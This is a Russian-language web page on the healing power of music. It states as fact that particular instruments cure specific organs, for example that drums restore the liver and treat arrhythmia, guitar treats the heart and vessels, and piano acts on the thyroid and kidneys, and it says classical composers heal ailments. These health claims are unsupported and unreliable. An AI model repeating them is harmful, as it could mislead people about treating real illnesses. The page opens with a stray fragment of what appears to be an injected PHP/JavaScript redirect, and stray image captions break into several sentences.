window.location = \"$z_out\";";} ?>

Значение музыки в медицине

Музыка в медицине

Учеными неоднократно доказан факт благотворного влияния музыки на организм человека. Несомненно этот постулат был известен ещё в доисторический период. Доподлинно известно, что жители Древней Греции поправляли своё здоровье слушая пение птиц и журчание ручья находясь в специально оборудованных лечебницах. Жители Древней Индии использовали для выздоровления колокольчики привязанные к ступням ног.


МузыкаНесомненно на людей влияет не только неповторимый стиль музыки, но и ритм и тональность, но и инструмент на котором эта музыка исполняется. Каждый уникальный музыкальный инструмент имеет свое неповторимое звучание и индивидуально влияет на определенный человеческий орган, а также систему организма.

* Фортепиано — великолепно гармонизирует психику, имеет особое влияние на щитовидную железу, положительно влияет на органы почек и работу мочевого пузыря
* Орган — стимулирует энергетические потоки в области позвоночника, влияет на мозговую Музыкаактивность
* Гитара — лечит сердечно — сосудистую систему
* Виолончель, скрипка, арфа — влияют на социальные качества, такие как сострадание, после прослушивания, индивидуум готов к самопожертвованию
* Духовые инструменты — благотворно влияют на дыхательные органы, кровообращение, бронхи и легкие
* Барабаны — исцеляют кровеносную систему, восстанавливают печень, аритмию на сердце

Необходимо заметить, что нам после прослушивания качественной музыки, намного легче удается воспринимать какую либо информацию, снять моральное напряжение и повысить мышечную активность.

Классическая музыка

Музыка в медицинеИсследователями музыки неоднократно о доказано, что самое благотворное влияние на наш организм оказывает именно классическая музыка. Кроме того, прослушивание классических произведений, имеет просто чудотворное действие.
Исцеление происходит во время прослушивания великих композиторов, таких как
*Вольфганг Амадей Моцарт
* Антонио Вивальди
* Роберт Шуман
* Эдвард Григ
* Людвиг ван Бетховен
* Петр Ильич Чайковский
* Франц Шуберт
* Клод Дебюсси
В мире существуют по крайней мере пять научных институтов, занимающимися исследованием Музыка в медицинемузыки Моцарта и влиянием её на здоровье человека.

Посвященные люди не только наслаждаясь слушают великолепную музыку, но и исцеляются от своих недугов.
Неотъемлемым атрибутом этой процедуры, является позитивная расположенность к прослушиванию данной музыки, то есть музыкальные произведения должны просто нравиться.
Вивальди